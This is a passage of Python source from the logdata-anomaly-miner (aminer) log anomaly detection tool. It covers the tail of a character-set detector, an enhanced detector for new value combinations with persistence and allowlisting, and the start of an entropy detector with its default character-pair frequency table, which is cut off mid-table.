tuple(id_vals) # Check if one of the values has new characters for a specific id path. 
if id_event in self.charsets: missing_chars = set() for c in b''.join(values): if c not in self.charsets[id_event]: missing_chars.add(c) if len(missing_chars) > 0: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] missing_chars_decoded = [] for character in missing_chars: missing_chars_decoded.append(character.to_bytes(1, 'big').decode(AminerConfig.ENCODING)) affected_values = [] for value in values: affected_values.append(value.decode(AminerConfig.ENCODING)) analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': affected_values, 'MissingCharacters': missing_chars_decoded} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New character(s) detected', sorted_log_lines, event_data, log_atom, self) # Extend charsets if learn mode is active. 
if self.learn_mode: self.charsets[id_event].update(missing_chars) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time else: self.charsets[id_event] = set(b''.join(values)) self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" lst = [] for id_ev, charset in self.charsets.items(): lst.append([id_ev, list(charset)]) PersistenceUtil.store_json(self.persistence_file_name, lst) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' 
def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 EnhancedNewMatchPathValueComboDetector.py000066400000000000000000000266161437606560100407600ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This file defines the EnhancedNewMatchPathValueComboDetector. detector to extract values from LogAtoms and check, if the value combination was already seen before. 
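This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""

import time
import os
import logging

from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector
from aminer.util import PersistenceUtil
from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, STAT_LOG_NAME,\
    CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig


class EnhancedNewMatchPathValueComboDetector(NewMatchPathValueComboDetector):
    """
    This class creates events when a new value combination for a given list of match data paths was found.

    It is similar to the NewMatchPathValueComboDetector basic detector but also provides support for storing meta information
    about each detected value combination, e.g.
    * the first time a tuple was detected using the LogAtom default timestamp.
    * the last time a tuple was seen
    * the number of times the tuple was seen
    * user data for annotation.
    Every known combination is a key of known_values_dict whose value is the list
    [TimeFirstOccurrence, TimeLastOccurrence, NumberOfOccurrences].
    Due to the additional features, this detector is slower than the basic detector.
    """

    def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id='Default',
                 allow_missing_values_flag=False, learn_mode=False, tuple_transformation_function=None, output_logline=True,
                 stop_learning_time=None, stop_learning_no_anomaly_time=None):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.

        @param aminer_config configuration from analysis_context.
        @param target_path_list the list of values to extract from each match to create the value combination to be checked.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param persistence_id name of persistence file.
        @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from
               target_path_list does not refer to an existing parsed data object.
        @param learn_mode when set to True, this detector will report a new value only the first time before including it in the
               known values set automatically.
        @param tuple_transformation_function when not None, this function will be invoked on each extracted value combination
               list to transform it. It may modify the list directly or create a new one to return it.
        @param output_logline passed on to the base class; receive_atom of this detector does not consult it and always
               includes the log line in the event output.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        # Initialised before the base constructor runs, so that a load_persistence_data() call triggered from there
        # (presumably by the base class; not visible here) finds the dictionary in place.
        self.known_values_dict = {}
        self.tuple_transformation_function = tuple_transformation_function
        super().__init__(
            aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers,
            persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode,
            output_logline=output_logline, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time)
        self.date_string = "%Y-%m-%d %H:%M:%S"
        # Counters for log_statistics(); reset there after every report.
        self.log_learned_path_value_combos = 0
        self.log_new_learned_values = []

    def load_persistence_data(self):
        """Load the persistence data from storage."""
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            # Dictionary and tuples were stored as list of lists. Transform the first lists to tuples to allow
            # the hash operation needed for dictionary keys.
            for value_tuple, extra_data in persistence_data:
                self.known_values_dict[tuple(value_tuple)] = extra_data
        logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

    def receive_atom(self, log_atom):
        """
        Receive one parsed atom and the information about the parser match.

        The value combination is extracted from target_path_list, optionally transformed, and looked up in known_values_dict.
        Unknown combinations are stored as [timestamp, timestamp, 1]; known ones get their last-seen timestamp and counter
        updated. An event is emitted for every atom when learn_mode is False, and only on the first occurrence of a
        combination when learn_mode is True.
        @param log_atom the LogAtom to analyze.
        @return True if a value combination was extracted and checked against the list of known combinations, no matter if the
                checked values were new or not; False when a target path is missing and allow_missing_values_flag is False.
        """
        self.log_total += 1
        match_dict = log_atom.parser_match.get_match_dictionary()
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        # Fall back to the wall clock when the atom carries no timestamp; keep millisecond resolution.
        timestamp = log_atom.get_timestamp()
        if timestamp is None:
            timestamp = time.time()
        timestamp = round(timestamp, 3)

        match_value_list = []
        for target_path in self.target_path_list:
            match = match_dict.get(target_path)
            if match is None:
                if not self.allow_missing_values_flag:
                    return False
                match_value_list.append(None)
                continue
            # A path may map to several match elements; each match object takes part in the combination.
            matches = match if isinstance(match, list) else [match]
            for match_element in matches:
                match_value_list.append(match_element.match_object)
        if self.tuple_transformation_function is not None:
            match_value_list = self.tuple_transformation_function(match_value_list)
        match_value_tuple = tuple(match_value_list)

        # extra_data is the per-combination record [TimeFirstOccurrence, TimeLastOccurrence, NumberOfOccurrences].
        extra_data = self.known_values_dict.get(match_value_tuple)
        if extra_data is None:
            extra_data = [timestamp, timestamp, 1]
            self.known_values_dict[match_value_tuple] = extra_data
            self.log_new_learned_values.append(match_value_tuple)
        else:
            extra_data[1] = timestamp
            extra_data[2] += 1

        affected_log_atom_values = []
        for match_value in match_value_tuple:
            if isinstance(match_value, bytes):
                match_value = match_value.decode(AminerConfig.ENCODING)
            affected_log_atom_values.append(str(match_value))
        metadata = {
            'TimeFirstOccurrence': extra_data[0],
            'TimeLastOccurrence': extra_data[1],
            'NumberOfOccurrences': extra_data[2]}
        analysis_component = {
            'AffectedLogAtomPaths': self.target_path_list,
            'AffectedLogAtomValues': affected_log_atom_values,
            'Metadata': metadata}
        event_data = {'AnalysisComponent': analysis_component}

        # Report every atom while not learning; while learning, only the first occurrence of a combination.
        if not self.learn_mode or extra_data[2] == 1:
            self.log_learned_path_value_combos += 1
            try:
                data = log_atom.raw_data.decode(AminerConfig.ENCODING)
            except UnicodeError:
                data = repr(log_atom.raw_data)
            original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
            # NOTE(review): the complete known_values_dict is rendered into every event, independent of output_logline;
            # with many learned combinations this makes each event large.
            log_line = str(self.known_values_dict) + os.linesep + original_log_line_prefix + data
            for listener in self.anomaly_event_handlers:
                listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New value combination(s) detected', [log_line],
                                       event_data, log_atom, self)
            if self.learn_mode and self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time
        self.log_success += 1
        return True

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.

        @param trigger_time the time the timer was triggered.
        @return the number of seconds until the next persistence run.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """Immediately write persistence data to storage as a list of [value_combination, extra_data] pairs."""
        persistence_data = list(self.known_values_dict.items())
        PersistenceUtil.store_json(self.persistence_file_name, persistence_data)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """
        Allowlist an event generated by this source using the information emitted when generating the event.

        @param event_type must be 'Analysis.' followed by this class name.
        @param event_data a sequence [timestamp, value_combination]; the combination is registered as seen once at timestamp.
        @param allowlisting_data not supported by this detector, must be None.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = 'Allowlisting data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if not isinstance(event_data, (list, tuple)) or len(event_data) < 2:
            msg = 'Allowlisting event data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        current_timestamp = event_data[0]
        value_combination = event_data[1]
        # A combination that arrives as a list (e.g. after a JSON round trip) is not hashable; convert it to the tuple form
        # used as key by receive_atom. Any other value is used as key unchanged.
        if isinstance(value_combination, list):
            value_combination = tuple(value_combination)
        self.known_values_dict[value_combination] = [current_timestamp, current_timestamp, 1]
        return f"Allowlisted path(es) {', '.join(self.target_path_list)} with {event_data}."

    def log_statistics(self, component_name):
        """
        Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        Level 1 reports the counters only; level 2 additionally lists the newly learned combinations. All counters are reset
        afterwards.
        @param component_name the name of the component which is printed in the log line.
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes.",
                component_name, self.log_success, self.log_total, self.log_learned_path_value_combos)
        elif AminerConfig.STAT_LEVEL == 2:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes."
                " Following new value combinations were learned: %s", component_name, self.log_success, self.log_total,
                self.log_learned_path_value_combos, self.log_new_learned_values)
        self.log_success = 0
        self.log_total = 0
        self.log_learned_path_value_combos = 0
        self.log_new_learned_values = []
EntropyDetector.py000066400000000000000000001401251437606560100344620ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""
This module defines a detector for character pair probabilities in values.
The idea is based on freq.py (https://github.com/markbaggett/freq) by Mark Baggett.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.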
""" import os import logging import time from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX,\ KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EntropyDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when character pairs with low probabilities occur in values.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, prob_thresh=0.05, default_freqs=False, skip_repetitions=False, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered as if they occur in the same path. @param prob_thresh limit for the average probability of character pairs for which anomalies are reported. @param default_freqs initializes the probabilities with default values from https://github.com/markbaggett/freq. @param skip_repetitions boolean that determines whether only distinct values are used for character pair counting. This counteracts the problem of imbalanced word frequencies that distort the frequency table generated in a single aminer run. 
@param persistence_id name of persistence file. @param learn_mode when set to True, the detector will extend the table of character pair frequencies based on new values. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, prob_thresh=prob_thresh, skip_repetitions=skip_repetitions, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.value_set = set() self.freq = {} if default_freqs is True: # Default probabilities taken from https://github.com/markbaggett/freq default_f = [True, "\n\t~`!@#$%^&*()_+-", [["\f", [["f", 2]]], [" ", [[" ", 312527], ["$", 12], ["(", 1520], [",", 6], ["0", 2], ["4", 210], ["8", 75], ["<", 58], ["D", 5449], ["H", 14898], ["L", 6849], ["P", 10276], ["T", 23773], ["X", 290], ["`", 1958], ["d", 74474], ["h", 195782], ["l", 64742], ["p", 65902], ["t", 408490], ["x", 22], ["|", 38], ["#", 6], ["'", 3062], ["+", 2], ["/", 12], ["3", 300], ["7", 134], [";", 8], ["?", 8], ["C", 9334], ["G", 5688], ["K", 2484], ["O", 4266], ["S", 13139], ["W", 9355], 
["[", 408], ["_", 220], ["c", 90632], ["g", 44086], ["k", 13940], ["o", 161371], ["s", 182472], ["w", 187994], ["{", 8], ["\"", 22346], ["&", 42], ["*", 112], [".", 2358], ["2", 691], ["6", 180], [":", 14], [">", 2], ["B", 12213], ["F", 8428], ["J", 5957], ["N", 7370], ["R", 5046], ["V", 3389], ["Z", 250], ["b", 109654], ["f", 95818], ["j", 6186], ["n", 56010], ["r", 54486], ["v", 15242], ["z", 238], ["~", 2], ["%", 2], [")", 2], ["-", 550], ["1", 1613], ["5", 132], ["9", 74], ["A", 16635], ["E", 4590], ["I", 45393], ["M", 17353], ["Q", 356], ["U", 753], ["Y", 2574], ["a", 293192], ["e", 47200], ["i", 125201], ["m", 99016], ["q", 5914], ["u", 27850], ["y", 29288]]], ["$", [[" ", 2], ["3", 2], ["2", 6], ["4", 10]]], ["(", [[" ", 2], ["\"", 34], ["$", 12], ["'", 24], ["*", 8], ["1", 28], ["3", 24], ["2", 30], ["5", 2], ["A", 54], ["C", 12], ["B", 32], ["E", 12], ["D", 16], ["G", 6], ["F", 40], ["I", 120], ["H", 48], ["K", 10], ["J", 2], ["M", 48], ["L", 14], ["O", 20], ["N", 26], ["P", 26], ["S", 46], ["U", 8], ["T", 124], ["W", 38], ["V", 2], ["Y", 4], ["_", 14], ["a", 306], ["`", 2], ["c", 22], ["b", 50], ["e", 24], ["d", 18], ["g", 10], ["f", 80], ["i", 122], ["h", 102], ["k", 2], ["j", 2], ["m", 20], ["l", 20], ["o", 86], ["n", 38], ["p", 16], ["s", 106], ["r", 6], ["u", 6], ["t", 240], ["w", 212], ["v", 2], ["y", 6], ["~", 8]]], [",", [["!", 2], [" ", 200706], ["\"", 10148], ["'", 1656], [")", 4], ["*", 18], ["-", 780], [",", 10], ["1", 40], ["0", 263], ["3", 6], ["2", 42], ["5", 44], ["4", 28], ["7", 4], ["6", 20], ["9", 12], ["8", 18], [":", 4], ["A", 4], ["I", 42], ["J", 2], ["M", 2], ["T", 2], ["[", 2], ["a", 328], ["c", 8], ["b", 76], ["e", 6], ["d", 4], ["g", 10], ["f", 60], ["i", 36], ["h", 36], ["k", 6], ["m", 10], ["l", 6], ["o", 22], ["n", 8], ["q", 2], ["p", 2], ["s", 64], ["r", 8], ["t", 84], ["w", 70]]], ["0", [[" ", 512], ["%", 16], ["'", 14], [")", 20], ["-", 20], [",", 155], [".", 70], ["1", 38], ["0", 714], ["3", 17], ["2", 32], ["5", 34], ["4", 
13], ["7", 30], ["6", 21], ["9", 34], ["8", 20], [";", 8], [":", 22], ["@", 20], ["I", 6], ["]", 46], ["m", 2], ["s", 6], ["t", 74], ["x", 10], ["}", 18]]], ["4", [[" ", 70], ["'", 4], [")", 2], ["-", 12], [",", 70], [".", 46], ["1", 24], ["0", 82], ["3", 24], ["2", 24], ["5", 34], ["4", 16], ["7", 28], ["6", 16], ["9", 24], ["8", 34], [";", 6], [":", 44], ["@", 8], ["T", 2], ["]", 60], ["t", 64], ["}", 18], ["|", 32]]], ["8", [[" ", 64], ["'", 6], ["-", 12], [",", 68], [".", 28], ["1", 192], ["0", 155], ["3", 132], ["2", 89], ["5", 26], ["4", 56], ["7", 26], ["6", 74], ["9", 37], ["8", 12], [";", 12], [":", 14], ["?", 2], ["@", 10], ["]", 54], ["m", 2], ["t", 56], ["}", 18], ["|", 44]]], ["<", [["A", 64], ["C", 132], ["B", 10], ["E", 18], ["D", 14], ["G", 4], ["F", 20], ["I", 14], ["H", 94], ["K", 2], ["M", 14], ["L", 8], ["O", 14], ["N", 2], ["P", 14], ["S", 14], ["R", 10], ["T", 224], ["W", 24], ["Y", 2], ["m", 2], ["s", 2]]], ["@", [[" ", 102], ["c", 8], ["e", 14], [",", 8], [".", 8], ["u", 6], ["v", 16]]], ["D", [["!", 4], [" ", 358], ["'", 72], ["*", 16], ["-", 64], [",", 14], [".", 66], [";", 2], ["?", 2], ["A", 93], ["C", 2], ["E", 240], ["D", 2], ["G", 10], ["F", 8], ["I", 220], ["M", 2], ["L", 2], ["O", 89], ["N", 14], ["P", 2], ["S", 28], ["R", 70], ["U", 24], ["V", 2], ["Y", 12], ["a", 1027], ["e", 2124], ["i", 779], ["j", 6], ["m", 148], ["o", 2366], ["n", 8], ["r", 642], ["u", 914], ["w", 4], ["y", 20]]], ["H", [[" ", 112], ["'", 14], [",", 8], [".", 210], ["1", 126], ["3", 42], ["2", 54], ["5", 12], ["4", 12], ["7", 12], ["6", 12], ["9", 12], ["8", 12], ["?", 2], ["A", 410], ["E", 722], ["F", 4], ["I", 298], ["M", 4], ["O", 260], ["N", 2], ["Q", 4], ["S", 6], ["R", 20], ["U", 26], ["T", 60], ["Y", 20], ["a", 2890], ["e", 16114], ["i", 2886], ["h", 2], ["m", 2], ["o", 2880], ["s", 4], ["u", 596], ["v", 2], ["y", 24]]], ["L", [["!", 2], [" ", 102], ["'", 40], [")", 2], ["-", 4], [",", 10], [".", 40], ["1", 6], ["2", 8], ["5", 2], ["4", 2], ["6", 2], 
["8", 2], [":", 8], ["A", 120], ["C", 14], ["E", 261], ["D", 38], ["G", 14], ["F", 26], ["I", 210], ["H", 4], ["K", 46], ["J", 2], ["M", 6], ["L", 134], ["O", 98], ["N", 2], ["P", 4], ["S", 36], ["R", 6], ["U", 84], ["T", 12], ["W", 2], ["Y", 32], ["a", 2534], ["e", 1957], ["i", 1482], ["h", 70], ["l", 2], ["o", 2216], ["u", 614], ["w", 2], ["y", 30]]], ["P", [["!", 2], [" ", 30], ["-", 4], [".", 72], ["A", 198], ["E", 228], ["G", 8], ["I", 66], ["H", 24], ["K", 2], ["M", 8], ["L", 90], ["O", 110], ["P", 26], ["S", 18], ["R", 198], ["U", 54], ["T", 202], ["Y", 10], ["a", 2387], ["e", 1866], ["f", 50], ["i", 2690], ["h", 472], ["l", 486], ["o", 1094], ["s", 84], ["r", 4898], ["u", 314], ["t", 12], ["w", 2], ["y", 38]]], ["T", [["!", 20], [" ", 496], ["'", 18], ["*", 34], ["-", 20], [",", 66], [".", 132], [":", 6], ["A", 150], ["C", 14], ["B", 2], ["E", 2568], ["F", 2], ["I", 236], ["H", 1216], ["M", 20], ["L", 24], ["O", 330], ["N", 14], ["P", 14], ["S", 62], ["R", 71], ["U", 70], ["T", 106], ["W", 110], ["Y", 144], ["Z", 2], ["a", 643], ["e", 802], ["i", 1134], ["h", 41758], ["o", 3328], ["s", 100], ["r", 532], ["u", 500], ["w", 517], ["v", 8], ["y", 54], ["z", 4]]], ["X", [["A", 2], [" ", 22], ["C", 6], ["E", 2], ["'", 2], ["I", 444], ["-", 2], [",", 4], [".", 84], ["1", 2], ["P", 6], ["2", 2], ["u", 30], ["T", 78], ["V", 302], ["X", 266], [":", 6], ["e", 4]]], ["`", [[" ", 4], ["\"", 2], ["'", 2], ["2", 2], ["A", 122], ["C", 26], ["B", 74], ["E", 14], ["D", 38], ["G", 30], ["F", 28], ["I", 270], ["H", 66], ["K", 4], ["J", 30], ["M", 66], ["L", 44], ["O", 26], ["N", 52], ["P", 34], ["S", 80], ["R", 14], ["U", 6], ["T", 166], ["W", 92], ["V", 4], ["Y", 66], ["_", 2], ["a", 62], ["c", 32], ["b", 40], ["e", 40], ["d", 24], ["g", 28], ["f", 38], ["i", 24], ["h", 26], ["k", 6], ["j", 2], ["m", 40], ["l", 28], ["o", 24], ["n", 14], ["q", 2], ["p", 40], ["s", 34], ["r", 18], ["u", 10], ["t", 98], ["w", 22], ["v", 2], ["y", 8]]], ["d", [["!", 1346], [" ", 316392], ["\"", 
78], ["'", 892], [")", 158], ["-", 2110], [",", 27454], [".", 15448], ["1", 6], [";", 2238], [":", 1318], ["?", 904], [">", 32], ["]", 6], ["_", 10], ["a", 15612], ["`", 12], ["c", 64], ["b", 98], ["e", 66856], ["d", 5952], ["g", 2672], ["f", 682], ["i", 36856], ["h", 178], ["k", 152], ["j", 316], ["m", 1162], ["l", 4894], ["o", 27386], ["n", 2680], ["q", 32], ["p", 44], ["s", 12352], ["r", 13004], ["u", 5376], ["t", 176], ["w", 382], ["v", 1300], ["y", 5438], ["z", 4], ["}", 6]]], ["h", [["!", 1480], [" ", 66490], ["\"", 16], ["'", 580], [")", 46], ["-", 674], [",", 7634], [".", 3060], [";", 500], [":", 124], ["?", 354], [">", 8], ["_", 8], ["a", 130321], ["`", 2], ["c", 78], ["b", 454], ["e", 366316], ["d", 180], ["g", 2], ["f", 464], ["i", 118000], ["h", 16], ["k", 98], ["m", 1012], ["l", 810], ["o", 56794], ["n", 878], ["q", 34], ["p", 20], ["s", 1392], ["r", 8693], ["u", 9628], ["t", 23686], ["w", 410], ["v", 4], ["y", 4342], ["z", 2]]], ["l", [["!", 688], [" ", 55493], ["\"", 28], ["'", 776], [")", 58], ["*", 8], ["-", 1168], [",", 9058], ["/", 2], [".", 4175], ["1", 2], ["2", 4], [";", 588], [":", 138], ["?", 512], [">", 18], ["@", 2], ["]", 2], ["_", 14], ["a", 40424], ["c", 880], ["b", 428], ["e", 90647], ["d", 35897], ["g", 498], ["f", 11866], ["i", 53960], ["h", 30], ["k", 3952], ["j", 880], ["m", 2350], ["l", 72010], ["o", 43088], ["n", 488], ["q", 6], ["p", 1936], ["s", 9240], ["r", 1482], ["u", 8878], ["t", 7890], ["w", 1710], ["v", 3288], ["y", 43772], ["x", 2], ["z", 52]]], ["p", [["!", 222], [" ", 12684], ["\"", 12], ["'", 274], [")", 8], ["*", 16], ["-", 458], [",", 2678], [".", 1598], [";", 206], [":", 32], ["?", 102], [">", 2], ["_", 2], ["a", 24384], ["c", 110], ["b", 74], ["e", 40018], ["d", 12], ["g", 26], ["f", 100], ["i", 12578], ["h", 3890], ["k", 248], ["m", 220], ["l", 19938], ["o", 24960], ["n", 82], ["p", 12676], ["s", 4980], ["r", 27372], ["u", 7468], ["t", 8624], ["w", 150], ["y", 1538], ["z", 4]]], ["t", [["!", 1698], [" ", 244288], 
["\"", 74], ["'", 4144], [")", 206], ["*", 10], ["-", 2634], [",", 24442], ["/", 22], [".", 15012], ["9", 30], [";", 1952], [":", 386], ["?", 2014], [">", 34], ["@", 16], ["I", 4], ["N", 2], ["]", 6], ["_", 20], ["a", 36864], ["c", 4804], ["b", 164], ["e", 93708], ["d", 32], ["g", 50], ["f", 1186], ["i", 67393], ["h", 380618], ["k", 30], ["j", 2], ["m", 1109], ["l", 15192], ["o", 120320], ["n", 980], ["p", 168], ["s", 20376], ["r", 31046], ["u", 18070], ["t", 25046], ["w", 8348], ["v", 6], ["y", 14950], ["x", 22], ["z", 596]]], ["x", [["!", 16], [" ", 1654], ["'", 108], [")", 6], ["-", 174], [",", 480], ["/", 2], [".", 262], ["1", 10], [";", 40], [":", 6], ["?", 20], ["_", 4], ["a", 1314], ["c", 2462], ["b", 4], ["e", 1456], ["g", 2], ["f", 26], ["i", 1676], ["h", 354], ["l", 20], ["o", 82], ["q", 56], ["p", 3828], ["s", 6], ["u", 144], ["t", 3514], ["w", 4], ["y", 88], ["x", 30]]], ["|", [[" ", 30], ["C", 294]]], ["#", [["1", 6], [" ", 2]]], ["'", [["!", 22], [" ", 5218], ["\"", 130], ["'", 52], [")", 8], ["-", 136], [",", 274], [".", 194], ["9", 24], ["8", 10], [";", 12], [":", 4], ["?", 40], ["A", 506], ["C", 94], ["B", 292], ["E", 88], ["D", 124], ["G", 154], ["F", 90], ["I", 826], ["H", 360], ["K", 12], ["J", 52], ["M", 174], ["L", 102], ["O", 202], ["N", 222], ["Q", 12], ["P", 86], ["S", 328], ["R", 24], ["U", 38], ["T", 922], ["W", 482], ["V", 22], ["Y", 356], ["a", 288], ["c", 614], ["b", 42], ["e", 614], ["d", 2832], ["g", 48], ["f", 28], ["i", 98], ["h", 36], ["k", 6], ["m", 1148], ["l", 1792], ["o", 90], ["n", 44], ["q", 2], ["p", 40], ["s", 16835], ["r", 660], ["u", 62], ["t", 7172], ["w", 60], ["v", 880], ["y", 66], ["}", 2]]], ["+", [[";", 2], ["B", 2], ["-", 4]]], ["/", [[" ", 26], ["\"", 2], ["e", 